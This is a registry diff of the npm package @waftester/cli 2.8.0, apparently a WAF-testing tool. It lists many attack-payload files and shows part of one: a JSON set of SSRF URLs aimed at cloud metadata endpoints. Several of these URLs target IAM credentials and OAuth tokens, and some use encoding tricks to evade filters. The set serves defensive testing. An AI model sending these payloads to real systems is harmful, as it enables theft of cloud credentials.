@waftester/cli 2.8.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (141) hide show
  1. package/LICENSE +80 -0
  2. package/LICENSE-COMMUNITY +28 -0
  3. package/README.md +121 -0
  4. package/bin/cli.js +152 -0
  5. package/package.json +52 -0
  6. package/payloads/community/README.md +45 -0
  7. package/payloads/community/ai/ml-poisoning.json +173 -0
  8. package/payloads/community/ai/prompt-injection.json +247 -0
  9. package/payloads/community/ai/workflow-abuse.json +222 -0
  10. package/payloads/community/auth/jwt.json +855 -0
  11. package/payloads/community/auth/login-bypass.json +623 -0
  12. package/payloads/community/auth/mfa.json +402 -0
  13. package/payloads/community/auth/oauth.json +421 -0
  14. package/payloads/community/auth/open-redirect.json +1028 -0
  15. package/payloads/community/auth/session.json +404 -0
  16. package/payloads/community/cache/deception.json +402 -0
  17. package/payloads/community/cache/poisoning.json +403 -0
  18. package/payloads/community/deserialization/gadget.json +375 -0
  19. package/payloads/community/deserialization/prototype.json +370 -0
  20. package/payloads/community/fuzz/content-type.json +397 -0
  21. package/payloads/community/fuzz/headers.json +401 -0
  22. package/payloads/community/fuzz/methods.json +397 -0
  23. package/payloads/community/fuzz/obfuscation.json +362 -0
  24. package/payloads/community/fuzz/special-chars.json +740 -0
  25. package/payloads/community/fuzz/waf-bypass.json +452 -0
  26. package/payloads/community/graphql/batching-abuse.json +271 -0
  27. package/payloads/community/graphql/depth-limit.json +271 -0
  28. package/payloads/community/graphql/introspection.json +267 -0
  29. package/payloads/community/injection/crlf.json +569 -0
  30. package/payloads/community/injection/ldap.json +357 -0
  31. package/payloads/community/injection/nosqli.json +529 -0
  32. package/payloads/community/injection/oscmd.json +662 -0
  33. package/payloads/community/injection/rce-polyglots.json +452 -0
  34. package/payloads/community/injection/sqli.json +681 -0
  35. package/payloads/community/injection/ssti.json +584 -0
  36. package/payloads/community/injection/upload-attacks.json +632 -0
  37. package/payloads/community/injection/xpath.json +357 -0
  38. package/payloads/community/injection/xxe.json +716 -0
  39. package/payloads/community/logic/forced-browsing.json +405 -0
  40. package/payloads/community/logic/idor.json +1026 -0
  41. package/payloads/community/logic/privilege.json +337 -0
  42. package/payloads/community/media/exif-injection.json +225 -0
  43. package/payloads/community/media/metadata-poison.json +239 -0
  44. package/payloads/community/protocol/http-smuggling.json +798 -0
  45. package/payloads/community/protocol/http2-attacks.json +382 -0
  46. package/payloads/community/protocol/websocket-abuse.json +375 -0
  47. package/payloads/community/rate-limit/burst-simulation.json +286 -0
  48. package/payloads/community/rate-limit/bypass-attempts.json +326 -0
  49. package/payloads/community/rate-limit/zone-tests.json +332 -0
  50. package/payloads/community/services/authentik.json +415 -0
  51. package/payloads/community/services/immich.json +423 -0
  52. package/payloads/community/services/n8n.json +366 -0
  53. package/payloads/community/sqli-basic.json +182 -0
  54. package/payloads/community/ssrf/cloud-metadata.json +999 -0
  55. package/payloads/community/ssrf/dns-rebinding.json +503 -0
  56. package/payloads/community/ssrf/internal-networks.json +627 -0
  57. package/payloads/community/ssrf/protocol-smuggling.json +350 -0
  58. package/payloads/community/ssti/multi-language-templates.json +191 -0
  59. package/payloads/community/ssti/python-templates.json +200 -0
  60. package/payloads/community/traversal/basic.json +675 -0
  61. package/payloads/community/traversal/cloud-credentials.json +107 -0
  62. package/payloads/community/traversal/config-files.json +193 -0
  63. package/payloads/community/traversal/encoding.json +558 -0
  64. package/payloads/community/traversal/null-byte.json +105 -0
  65. package/payloads/community/traversal/symlink.json +93 -0
  66. package/payloads/community/traversal/unicode.json +134 -0
  67. package/payloads/community/traversal/unix-advanced.json +195 -0
  68. package/payloads/community/traversal/windows-advanced.json +195 -0
  69. package/payloads/community/waf-bypass/cloudflare-bypass.json +102 -0
  70. package/payloads/community/waf-bypass/encoding-bypass.json +120 -0
  71. package/payloads/community/waf-bypass/evasion-techniques.json +164 -0
  72. package/payloads/community/waf-bypass/hpp-bypass.json +92 -0
  73. package/payloads/community/waf-bypass/modsecurity-crs.json +220 -0
  74. package/payloads/community/waf-bypass/protocol-attacks.json +101 -0
  75. package/payloads/community/waf-bypass/sqlmap-tamper.json +252 -0
  76. package/payloads/community/waf-bypass/unicode-charset.json +152 -0
  77. package/payloads/community/waf-bypass/vendor-bypasses.json +72 -0
  78. package/payloads/community/waf-validation/README.md +172 -0
  79. package/payloads/community/waf-validation/bypass-techniques.json +272 -0
  80. package/payloads/community/waf-validation/custom-rules.json +952 -0
  81. package/payloads/community/waf-validation/evasion-techniques.json +272 -0
  82. package/payloads/community/waf-validation/modsecurity-core.json +151 -0
  83. package/payloads/community/waf-validation/owasp-top10.json +236 -0
  84. package/payloads/community/waf-validation/regression-tests.json +227 -0
  85. package/payloads/community/xss/csp-bypass.json +431 -0
  86. package/payloads/community/xss/dom.json +389 -0
  87. package/payloads/community/xss/filter-bypass.json +1242 -0
  88. package/payloads/community/xss/mutation.json +263 -0
  89. package/payloads/community/xss/polyglots.json +371 -0
  90. package/payloads/community/xss/reflected.json +187 -0
  91. package/payloads/community/xss/stored.json +330 -0
  92. package/payloads/crlf-injection.json +182 -0
  93. package/payloads/ids-map.json +155 -0
  94. package/payloads/ldap-injection.json +182 -0
  95. package/payloads/nosql-injection.json +227 -0
  96. package/payloads/prototype-pollution.json +182 -0
  97. package/payloads/request-smuggling.json +182 -0
  98. package/payloads/version.json +28 -0
  99. package/payloads/xss-advanced.json +227 -0
  100. package/templates/README.md +221 -0
  101. package/templates/nuclei/http/waf-bypass/crlf-bypass.yaml +146 -0
  102. package/templates/nuclei/http/waf-bypass/lfi-bypass.yaml +152 -0
  103. package/templates/nuclei/http/waf-bypass/nosqli-bypass.yaml +166 -0
  104. package/templates/nuclei/http/waf-bypass/rce-bypass.yaml +171 -0
  105. package/templates/nuclei/http/waf-bypass/sqli-basic.yaml +142 -0
  106. package/templates/nuclei/http/waf-bypass/sqli-evasion.yaml +192 -0
  107. package/templates/nuclei/http/waf-bypass/ssrf-bypass.yaml +130 -0
  108. package/templates/nuclei/http/waf-bypass/ssti-bypass.yaml +147 -0
  109. package/templates/nuclei/http/waf-bypass/xss-basic.yaml +163 -0
  110. package/templates/nuclei/http/waf-bypass/xss-evasion.yaml +217 -0
  111. package/templates/nuclei/http/waf-bypass/xxe-bypass.yaml +204 -0
  112. package/templates/nuclei/http/waf-detection/akamai-detect.yaml +105 -0
  113. package/templates/nuclei/http/waf-detection/aws-waf-detect.yaml +115 -0
  114. package/templates/nuclei/http/waf-detection/azure-waf-detect.yaml +114 -0
  115. package/templates/nuclei/http/waf-detection/cloudflare-detect.yaml +121 -0
  116. package/templates/nuclei/http/waf-detection/modsecurity-detect.yaml +129 -0
  117. package/templates/nuclei/workflows/waf-assessment-workflow.yaml +71 -0
  118. package/templates/output/asff.tmpl +61 -0
  119. package/templates/output/csv.tmpl +4 -0
  120. package/templates/output/junit.tmpl +34 -0
  121. package/templates/output/markdown-report.tmpl +92 -0
  122. package/templates/output/slack-notification.tmpl +95 -0
  123. package/templates/output/text-summary.tmpl +56 -0
  124. package/templates/overrides/api-only.yaml +130 -0
  125. package/templates/overrides/crs-tuning.yaml +204 -0
  126. package/templates/overrides/false-positive-suppression.yaml +159 -0
  127. package/templates/policies/owasp-top10.yaml +152 -0
  128. package/templates/policies/pci-dss.yaml +124 -0
  129. package/templates/policies/permissive.yaml +40 -0
  130. package/templates/policies/standard.yaml +57 -0
  131. package/templates/policies/strict.yaml +72 -0
  132. package/templates/report-configs/compliance.yaml +173 -0
  133. package/templates/report-configs/dark.yaml +136 -0
  134. package/templates/report-configs/enterprise.yaml +175 -0
  135. package/templates/report-configs/minimal.yaml +84 -0
  136. package/templates/report-configs/print.yaml +139 -0
  137. package/templates/workflows/api-scan.yaml +132 -0
  138. package/templates/workflows/ci-gate.yaml +129 -0
  139. package/templates/workflows/full-scan.yaml +133 -0
  140. package/templates/workflows/quick-probe.yaml +80 -0
  141. package/templates/workflows/waf-detection.yaml +89 -0
@@ -0,0 +1,999 @@
1
+ [
2
+ {
3
+ "id": "SSRF-CLOUD-001",
4
+ "payload": "http://169.254.169.254/latest/meta-data/",
5
+ "tags": [
6
+ "aws",
7
+ "imds",
8
+ "v1",
9
+ "quick",
10
+ "critical"
11
+ ],
12
+ "expected_block": true,
13
+ "severity_hint": "Critical",
14
+ "notes": "AWS IMDSv1 root endpoint",
15
+ "category": "SSRF"
16
+ },
17
+ {
18
+ "id": "SSRF-CLOUD-002",
19
+ "payload": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
20
+ "tags": [
21
+ "aws",
22
+ "imds",
23
+ "v1",
24
+ "credentials",
25
+ "quick"
26
+ ],
27
+ "expected_block": true,
28
+ "severity_hint": "Critical",
29
+ "notes": "AWS IMDSv1 IAM credentials endpoint",
30
+ "category": "SSRF"
31
+ },
32
+ {
33
+ "id": "SSRF-CLOUD-003",
34
+ "payload": "http://169.254.169.254/latest/user-data",
35
+ "tags": [
36
+ "aws",
37
+ "imds",
38
+ "v1",
39
+ "userdata"
40
+ ],
41
+ "expected_block": true,
42
+ "severity_hint": "Critical",
43
+ "notes": "AWS IMDSv1 user-data (often contains secrets)",
44
+ "category": "SSRF"
45
+ },
46
+ {
47
+ "id": "SSRF-CLOUD-004",
48
+ "payload": "http://169.254.169.254/latest/dynamic/instance-identity/document",
49
+ "tags": [
50
+ "aws",
51
+ "imds",
52
+ "v1",
53
+ "identity"
54
+ ],
55
+ "expected_block": true,
56
+ "severity_hint": "High",
57
+ "notes": "AWS instance identity document",
58
+ "category": "SSRF"
59
+ },
60
+ {
61
+ "id": "SSRF-CLOUD-005",
62
+ "payload": "http://169.254.169.254/latest/api/token",
63
+ "tags": [
64
+ "aws",
65
+ "imds",
66
+ "v2",
67
+ "token",
68
+ "quick"
69
+ ],
70
+ "expected_block": true,
71
+ "severity_hint": "Critical",
72
+ "notes": "AWS IMDSv2 session token endpoint",
73
+ "category": "SSRF"
74
+ },
75
+ {
76
+ "id": "SSRF-CLOUD-006",
77
+ "payload": "http://169.254.169.254/latest/meta-data/placement/availability-zone",
78
+ "tags": [
79
+ "aws",
80
+ "imds",
81
+ "v1",
82
+ "metadata"
83
+ ],
84
+ "expected_block": true,
85
+ "severity_hint": "Medium",
86
+ "notes": "AWS availability zone metadata",
87
+ "category": "SSRF"
88
+ },
89
+ {
90
+ "id": "SSRF-CLOUD-007",
91
+ "payload": "http://metadata.google.internal/computeMetadata/v1/",
92
+ "tags": [
93
+ "gcp",
94
+ "metadata",
95
+ "quick"
96
+ ],
97
+ "expected_block": true,
98
+ "severity_hint": "Critical",
99
+ "notes": "GCP metadata root endpoint",
100
+ "category": "SSRF"
101
+ },
102
+ {
103
+ "id": "SSRF-CLOUD-008",
104
+ "payload": "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token",
105
+ "tags": [
106
+ "gcp",
107
+ "metadata",
108
+ "credentials",
109
+ "quick"
110
+ ],
111
+ "expected_block": true,
112
+ "severity_hint": "Critical",
113
+ "notes": "GCP service account OAuth token",
114
+ "category": "SSRF"
115
+ },
116
+ {
117
+ "id": "SSRF-CLOUD-009",
118
+ "payload": "http://metadata/computeMetadata/v1/instance/attributes/",
119
+ "tags": [
120
+ "gcp",
121
+ "metadata",
122
+ "short-hostname"
123
+ ],
124
+ "expected_block": true,
125
+ "severity_hint": "High",
126
+ "notes": "GCP metadata via short hostname",
127
+ "category": "SSRF"
128
+ },
129
+ {
130
+ "id": "SSRF-CLOUD-010",
131
+ "payload": "http://169.254.169.254/metadata/instance?api-version=2021-02-01",
132
+ "tags": [
133
+ "azure",
134
+ "imds",
135
+ "quick"
136
+ ],
137
+ "expected_block": true,
138
+ "severity_hint": "Critical",
139
+ "notes": "Azure IMDS instance metadata",
140
+ "category": "SSRF"
141
+ },
142
+ {
143
+ "id": "SSRF-CLOUD-011",
144
+ "payload": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2021-02-01&resource=https://management.azure.com/",
145
+ "tags": [
146
+ "azure",
147
+ "imds",
148
+ "credentials",
149
+ "quick"
150
+ ],
151
+ "expected_block": true,
152
+ "severity_hint": "Critical",
153
+ "notes": "Azure managed identity OAuth token",
154
+ "category": "SSRF"
155
+ },
156
+ {
157
+ "id": "SSRF-CLOUD-012",
158
+ "payload": "http://169.254.169.254/metadata/attested/document?api-version=2021-02-01",
159
+ "tags": [
160
+ "azure",
161
+ "imds",
162
+ "attestation"
163
+ ],
164
+ "expected_block": true,
165
+ "severity_hint": "High",
166
+ "notes": "Azure attested data document",
167
+ "category": "SSRF"
168
+ },
169
+ {
170
+ "id": "SSRF-CLOUD-013",
171
+ "payload": "http://100.100.100.200/latest/meta-data/",
172
+ "tags": [
173
+ "alibaba",
174
+ "metadata",
175
+ "quick"
176
+ ],
177
+ "expected_block": true,
178
+ "severity_hint": "Critical",
179
+ "notes": "Alibaba Cloud metadata service",
180
+ "category": "SSRF"
181
+ },
182
+ {
183
+ "id": "SSRF-CLOUD-014",
184
+ "payload": "http://100.100.100.200/latest/meta-data/ram/security-credentials/",
185
+ "tags": [
186
+ "alibaba",
187
+ "metadata",
188
+ "credentials"
189
+ ],
190
+ "expected_block": true,
191
+ "severity_hint": "Critical",
192
+ "notes": "Alibaba Cloud RAM credentials",
193
+ "category": "SSRF"
194
+ },
195
+ {
196
+ "id": "SSRF-CLOUD-015",
197
+ "payload": "http://169.254.169.254/metadata/v1.json",
198
+ "tags": [
199
+ "digitalocean",
200
+ "metadata",
201
+ "quick"
202
+ ],
203
+ "expected_block": true,
204
+ "severity_hint": "High",
205
+ "notes": "DigitalOcean metadata service",
206
+ "category": "SSRF"
207
+ },
208
+ {
209
+ "id": "SSRF-CLOUD-016",
210
+ "payload": "http://169.254.169.254/metadata/v1/interfaces/public/0/ipv4/address",
211
+ "tags": [
212
+ "digitalocean",
213
+ "metadata"
214
+ ],
215
+ "expected_block": true,
216
+ "severity_hint": "Medium",
217
+ "notes": "DigitalOcean public IP metadata",
218
+ "category": "SSRF"
219
+ },
220
+ {
221
+ "id": "SSRF-CLOUD-017",
222
+ "payload": "http://169.254.169.254/openstack/latest/meta_data.json",
223
+ "tags": [
224
+ "openstack",
225
+ "metadata"
226
+ ],
227
+ "expected_block": true,
228
+ "severity_hint": "High",
229
+ "notes": "OpenStack metadata service",
230
+ "category": "SSRF"
231
+ },
232
+ {
233
+ "id": "SSRF-CLOUD-018",
234
+ "payload": "http://fd00:ec2::254/latest/meta-data/",
235
+ "tags": [
236
+ "aws",
237
+ "imds",
238
+ "ipv6",
239
+ "quick"
240
+ ],
241
+ "expected_block": true,
242
+ "severity_hint": "Critical",
243
+ "notes": "AWS IMDSv1 via IPv6 link-local",
244
+ "category": "SSRF"
245
+ },
246
+ {
247
+ "id": "SSRF-CLOUD-019",
248
+ "payload": "http://[fd00:ec2::254]/latest/meta-data/iam/security-credentials/",
249
+ "tags": [
250
+ "aws",
251
+ "imds",
252
+ "ipv6",
253
+ "credentials"
254
+ ],
255
+ "expected_block": true,
256
+ "severity_hint": "Critical",
257
+ "notes": "AWS IMDSv1 IAM credentials via IPv6",
258
+ "category": "SSRF"
259
+ },
260
+ {
261
+ "id": "SSRF-CLOUD-020",
262
+ "payload": "http://169.254.169.254/2009-04-04/meta-data/",
263
+ "tags": [
264
+ "aws",
265
+ "imds",
266
+ "v1",
267
+ "legacy-version"
268
+ ],
269
+ "expected_block": true,
270
+ "severity_hint": "Critical",
271
+ "notes": "AWS IMDS legacy API version",
272
+ "category": "SSRF"
273
+ },
274
+ {
275
+ "id": "SSRF-CLOUD-021",
276
+ "payload": "http://instance-data/latest/meta-data/",
277
+ "tags": [
278
+ "aws",
279
+ "imds",
280
+ "dns-alias"
281
+ ],
282
+ "expected_block": true,
283
+ "severity_hint": "High",
284
+ "notes": "AWS IMDS via instance-data DNS alias",
285
+ "category": "SSRF"
286
+ },
287
+ {
288
+ "id": "SSRF-CLOUD-022",
289
+ "payload": "http://metadata.google.internal/computeMetadata/v1beta1/",
290
+ "tags": [
291
+ "gcp",
292
+ "metadata",
293
+ "beta"
294
+ ],
295
+ "expected_block": true,
296
+ "severity_hint": "High",
297
+ "notes": "GCP metadata beta API version",
298
+ "category": "SSRF"
299
+ },
300
+ {
301
+ "id": "SSRF-CLOUD-023",
302
+ "payload": "http://metadata.google.internal/computeMetadata/v1/project/project-id",
303
+ "tags": [
304
+ "gcp",
305
+ "metadata",
306
+ "project"
307
+ ],
308
+ "expected_block": true,
309
+ "severity_hint": "Medium",
310
+ "notes": "GCP project ID metadata",
311
+ "category": "SSRF"
312
+ },
313
+ {
314
+ "id": "SSRF-CLOUD-024",
315
+ "payload": "http://169.254.169.254/metadata/instance/compute/azEnvironment?api-version=2021-02-01&format=text",
316
+ "tags": [
317
+ "azure",
318
+ "imds",
319
+ "environment"
320
+ ],
321
+ "expected_block": true,
322
+ "severity_hint": "Medium",
323
+ "notes": "Azure environment metadata",
324
+ "category": "SSRF"
325
+ },
326
+ {
327
+ "id": "SSRF-CLOUD-025",
328
+ "payload": "http://100.100.100.200/latest/dynamic/instance-identity/document",
329
+ "tags": [
330
+ "alibaba",
331
+ "metadata",
332
+ "identity"
333
+ ],
334
+ "expected_block": true,
335
+ "severity_hint": "High",
336
+ "notes": "Alibaba Cloud instance identity",
337
+ "category": "SSRF"
338
+ },
339
+ {
340
+ "id": "SSRF-CLOUD-026",
341
+ "payload": "http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key",
342
+ "tags": [
343
+ "aws",
344
+ "imds",
345
+ "v1",
346
+ "ssh-keys"
347
+ ],
348
+ "expected_block": true,
349
+ "severity_hint": "High",
350
+ "notes": "AWS SSH public keys",
351
+ "category": "SSRF"
352
+ },
353
+ {
354
+ "id": "SSRF-CLOUD-027",
355
+ "payload": "http://169.254.169.254/latest/meta-data/network/interfaces/macs/",
356
+ "tags": [
357
+ "aws",
358
+ "imds",
359
+ "v1",
360
+ "network"
361
+ ],
362
+ "expected_block": true,
363
+ "severity_hint": "Medium",
364
+ "notes": "AWS network interfaces metadata",
365
+ "category": "SSRF"
366
+ },
367
+ {
368
+ "id": "SSRF-CLOUD-028",
369
+ "payload": "http://metadata.google.internal/computeMetadata/v1/instance/hostname",
370
+ "tags": [
371
+ "gcp",
372
+ "metadata",
373
+ "hostname"
374
+ ],
375
+ "expected_block": true,
376
+ "severity_hint": "Low",
377
+ "notes": "GCP instance hostname",
378
+ "category": "SSRF"
379
+ },
380
+ {
381
+ "id": "SSRF-CLOUD-029",
382
+ "payload": "http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/privateIpAddress?api-version=2021-02-01&format=text",
383
+ "tags": [
384
+ "azure",
385
+ "imds",
386
+ "network"
387
+ ],
388
+ "expected_block": true,
389
+ "severity_hint": "Low",
390
+ "notes": "Azure private IP address",
391
+ "category": "SSRF"
392
+ },
393
+ {
394
+ "id": "SSRF-CLOUD-030",
395
+ "payload": "http://169.254.169.254/metadata/v1/user-data",
396
+ "tags": [
397
+ "digitalocean",
398
+ "metadata",
399
+ "userdata"
400
+ ],
401
+ "expected_block": true,
402
+ "severity_hint": "High",
403
+ "notes": "DigitalOcean user-data",
404
+ "category": "SSRF"
405
+ },
406
+ {
407
+ "id": "SSRF-CLOUD-031",
408
+ "payload": "http://169.254.169.254/latest/meta-data/events/maintenance/scheduled",
409
+ "tags": [
410
+ "aws",
411
+ "imds",
412
+ "v1",
413
+ "events"
414
+ ],
415
+ "expected_block": true,
416
+ "severity_hint": "Low",
417
+ "notes": "AWS scheduled maintenance events",
418
+ "category": "SSRF"
419
+ },
420
+ {
421
+ "id": "SSRF-CLOUD-032",
422
+ "payload": "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env",
423
+ "tags": [
424
+ "gcp",
425
+ "metadata",
426
+ "kubernetes"
427
+ ],
428
+ "expected_block": true,
429
+ "severity_hint": "Critical",
430
+ "notes": "GKE kube-env with cluster credentials",
431
+ "category": "SSRF"
432
+ },
433
+ {
434
+ "id": "SSRF-CLOUD-033",
435
+ "payload": "http://169.254.169.254/metadata/scheduledevents?api-version=2020-07-01",
436
+ "tags": [
437
+ "azure",
438
+ "imds",
439
+ "events"
440
+ ],
441
+ "expected_block": true,
442
+ "severity_hint": "Low",
443
+ "notes": "Azure scheduled events",
444
+ "category": "SSRF"
445
+ },
446
+ {
447
+ "id": "SSRF-CLOUD-034",
448
+ "payload": "http://100.100.100.200/latest/meta-data/instance-id",
449
+ "tags": [
450
+ "alibaba",
451
+ "metadata",
452
+ "instance"
453
+ ],
454
+ "expected_block": true,
455
+ "severity_hint": "Low",
456
+ "notes": "Alibaba Cloud instance ID",
457
+ "category": "SSRF"
458
+ },
459
+ {
460
+ "id": "SSRF-CLOUD-035",
461
+ "payload": "http://425.510.425.510/latest/meta-data/",
462
+ "tags": ["aws", "bypass", "overflow", "encoding"],
463
+ "expected_block": true,
464
+ "severity_hint": "Critical",
465
+ "notes": "AWS metadata - dotted decimal with overflow",
466
+ "category": "SSRF"
467
+ },
468
+ {
469
+ "id": "SSRF-CLOUD-036",
470
+ "payload": "http://2852039166/latest/meta-data/",
471
+ "tags": ["aws", "bypass", "decimal", "encoding"],
472
+ "expected_block": true,
473
+ "severity_hint": "Critical",
474
+ "notes": "AWS metadata - dotless decimal (169.254.169.254)",
475
+ "category": "SSRF"
476
+ },
477
+ {
478
+ "id": "SSRF-CLOUD-037",
479
+ "payload": "http://7147006462/latest/meta-data/",
480
+ "tags": ["aws", "bypass", "overflow", "encoding"],
481
+ "expected_block": true,
482
+ "severity_hint": "Critical",
483
+ "notes": "AWS metadata - dotless decimal with overflow",
484
+ "category": "SSRF"
485
+ },
486
+ {
487
+ "id": "SSRF-CLOUD-038",
488
+ "payload": "http://0xA9.0xFE.0xA9.0xFE/latest/meta-data/",
489
+ "tags": ["aws", "bypass", "hex", "encoding"],
490
+ "expected_block": true,
491
+ "severity_hint": "Critical",
492
+ "notes": "AWS metadata - dotted hexadecimal",
493
+ "category": "SSRF"
494
+ },
495
+ {
496
+ "id": "SSRF-CLOUD-039",
497
+ "payload": "http://0xA9FEA9FE/latest/meta-data/",
498
+ "tags": ["aws", "bypass", "hex", "encoding"],
499
+ "expected_block": true,
500
+ "severity_hint": "Critical",
501
+ "notes": "AWS metadata - dotless hexadecimal",
502
+ "category": "SSRF"
503
+ },
504
+ {
505
+ "id": "SSRF-CLOUD-040",
506
+ "payload": "http://0x41414141A9FEA9FE/latest/meta-data/",
507
+ "tags": ["aws", "bypass", "hex", "overflow"],
508
+ "expected_block": true,
509
+ "severity_hint": "Critical",
510
+ "notes": "AWS metadata - dotless hexadecimal with overflow",
511
+ "category": "SSRF"
512
+ },
513
+ {
514
+ "id": "SSRF-CLOUD-041",
515
+ "payload": "http://0251.0376.0251.0376/latest/meta-data/",
516
+ "tags": ["aws", "bypass", "octal", "encoding"],
517
+ "expected_block": true,
518
+ "severity_hint": "Critical",
519
+ "notes": "AWS metadata - dotted octal",
520
+ "category": "SSRF"
521
+ },
522
+ {
523
+ "id": "SSRF-CLOUD-042",
524
+ "payload": "http://0251.00376.000251.0000376/latest/meta-data/",
525
+ "tags": ["aws", "bypass", "octal", "padding"],
526
+ "expected_block": true,
527
+ "severity_hint": "Critical",
528
+ "notes": "AWS metadata - dotted octal with padding",
529
+ "category": "SSRF"
530
+ },
531
+ {
532
+ "id": "SSRF-CLOUD-043",
533
+ "payload": "http://0251.254.169.254/latest/meta-data/",
534
+ "tags": ["aws", "bypass", "mixed", "encoding"],
535
+ "expected_block": true,
536
+ "severity_hint": "Critical",
537
+ "notes": "AWS metadata - mixed encoding (octal + decimal)",
538
+ "category": "SSRF"
539
+ },
540
+ {
541
+ "id": "SSRF-CLOUD-044",
542
+ "payload": "http://[::ffff:a9fe:a9fe]/latest/meta-data/",
543
+ "tags": ["aws", "bypass", "ipv6", "encoding"],
544
+ "expected_block": true,
545
+ "severity_hint": "Critical",
546
+ "notes": "AWS metadata - IPv6 compressed",
547
+ "category": "SSRF"
548
+ },
549
+ {
550
+ "id": "SSRF-CLOUD-045",
551
+ "payload": "http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/",
552
+ "tags": ["aws", "bypass", "ipv6", "encoding"],
553
+ "expected_block": true,
554
+ "severity_hint": "Critical",
555
+ "notes": "AWS metadata - IPv6 expanded",
556
+ "category": "SSRF"
557
+ },
558
+ {
559
+ "id": "SSRF-CLOUD-046",
560
+ "payload": "http://[0:0:0:0:0:ffff:169.254.169.254]/latest/meta-data/",
561
+ "tags": ["aws", "bypass", "ipv6", "mixed"],
562
+ "expected_block": true,
563
+ "severity_hint": "Critical",
564
+ "notes": "AWS metadata - IPv6/IPv4 mixed",
565
+ "category": "SSRF"
566
+ },
567
+ {
568
+ "id": "SSRF-CLOUD-047",
569
+ "payload": "http://[fd00:ec2::254]/latest/meta-data/",
570
+ "tags": ["aws", "bypass", "ipv6", "ec2"],
571
+ "expected_block": true,
572
+ "severity_hint": "Critical",
573
+ "notes": "AWS metadata - IPv6 EC2 format",
574
+ "category": "SSRF"
575
+ },
576
+ {
577
+ "id": "SSRF-CLOUD-048",
578
+ "payload": "http://instance-data/latest/meta-data/",
579
+ "tags": ["aws", "bypass", "dns", "hostname"],
580
+ "expected_block": true,
581
+ "severity_hint": "Critical",
582
+ "notes": "AWS metadata - instance-data hostname",
583
+ "category": "SSRF"
584
+ },
585
+ {
586
+ "id": "SSRF-CLOUD-049",
587
+ "payload": "http://169.254.169.254.nip.io/latest/meta-data/",
588
+ "tags": ["aws", "bypass", "dns", "rebinding"],
589
+ "expected_block": true,
590
+ "severity_hint": "Critical",
591
+ "notes": "AWS metadata - nip.io DNS rebinding",
592
+ "category": "SSRF"
593
+ },
594
+ {
595
+ "id": "SSRF-CLOUD-050",
596
+ "payload": "http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key",
597
+ "tags": ["aws", "imds", "ssh", "keys"],
598
+ "expected_block": true,
599
+ "severity_hint": "High",
600
+ "notes": "AWS SSH public key extraction",
601
+ "category": "SSRF"
602
+ },
603
+ {
604
+ "id": "SSRF-CLOUD-051",
605
+ "payload": "http://169.254.170.2/v2/credentials/",
606
+ "tags": ["aws", "ecs", "credentials"],
607
+ "expected_block": true,
608
+ "severity_hint": "Critical",
609
+ "notes": "AWS ECS container credentials",
610
+ "category": "SSRF"
611
+ },
612
+ {
613
+ "id": "SSRF-CLOUD-052",
614
+ "payload": "http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role",
615
+ "tags": ["aws", "beanstalk", "credentials"],
616
+ "expected_block": true,
617
+ "severity_hint": "Critical",
618
+ "notes": "AWS Elastic Beanstalk EC2 role credentials",
619
+ "category": "SSRF"
620
+ },
621
+ {
622
+ "id": "SSRF-CLOUD-053",
623
+ "payload": "http://localhost:9001/2018-06-01/runtime/invocation/next",
624
+ "tags": ["aws", "lambda", "runtime"],
625
+ "expected_block": true,
626
+ "severity_hint": "Critical",
627
+ "notes": "AWS Lambda runtime API",
628
+ "category": "SSRF"
629
+ },
630
+ {
631
+ "id": "SSRF-CLOUD-054",
632
+ "payload": "http://metadata.google.internal/computeMetadata/v1beta1/",
633
+ "tags": ["gcp", "metadata", "v1beta1"],
634
+ "expected_block": true,
635
+ "severity_hint": "Critical",
636
+ "notes": "GCP metadata v1beta1 (no header required)",
637
+ "category": "SSRF"
638
+ },
639
+ {
640
+ "id": "SSRF-CLOUD-055",
641
+ "payload": "http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true",
642
+ "tags": ["gcp", "metadata", "recursive"],
643
+ "expected_block": true,
644
+ "severity_hint": "Critical",
645
+ "notes": "GCP metadata v1beta1 recursive dump",
646
+ "category": "SSRF"
647
+ },
648
+ {
649
+ "id": "SSRF-CLOUD-056",
650
+ "payload": "http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token",
651
+ "tags": ["gcp", "metadata", "token"],
652
+ "expected_block": true,
653
+ "severity_hint": "Critical",
654
+ "notes": "GCP access token extraction",
655
+ "category": "SSRF"
656
+ },
657
+ {
658
+ "id": "SSRF-CLOUD-057",
659
+ "payload": "http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json",
660
+ "tags": ["gcp", "metadata", "ssh"],
661
+ "expected_block": true,
662
+ "severity_hint": "Critical",
663
+ "notes": "GCP SSH keys extraction",
664
+ "category": "SSRF"
665
+ },
666
+ {
667
+ "id": "SSRF-CLOUD-058",
668
+ "payload": "http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json",
669
+ "tags": ["gcp", "kubernetes", "credentials"],
670
+ "expected_block": true,
671
+ "severity_hint": "Critical",
672
+ "notes": "GCP Kubernetes credentials",
673
+ "category": "SSRF"
674
+ },
675
+ {
676
+ "id": "SSRF-CLOUD-059",
677
+ "payload": "http://metadata/computeMetadata/v1/",
678
+ "tags": ["gcp", "metadata", "short"],
679
+ "expected_block": true,
680
+ "severity_hint": "Critical",
681
+ "notes": "GCP metadata short hostname",
682
+ "category": "SSRF"
683
+ },
684
+ {
685
+ "id": "SSRF-CLOUD-060",
686
+ "payload": "http://169.254.169.254/metadata/v1.json",
687
+ "tags": ["digitalocean", "metadata", "json"],
688
+ "expected_block": true,
689
+ "severity_hint": "High",
690
+ "notes": "DigitalOcean metadata JSON dump",
691
+ "category": "SSRF"
692
+ },
693
+ {
694
+ "id": "SSRF-CLOUD-061",
695
+ "payload": "http://169.254.169.254/metadata/v1/user-data",
696
+ "tags": ["digitalocean", "metadata", "userdata"],
697
+ "expected_block": true,
698
+ "severity_hint": "High",
699
+ "notes": "DigitalOcean user-data",
700
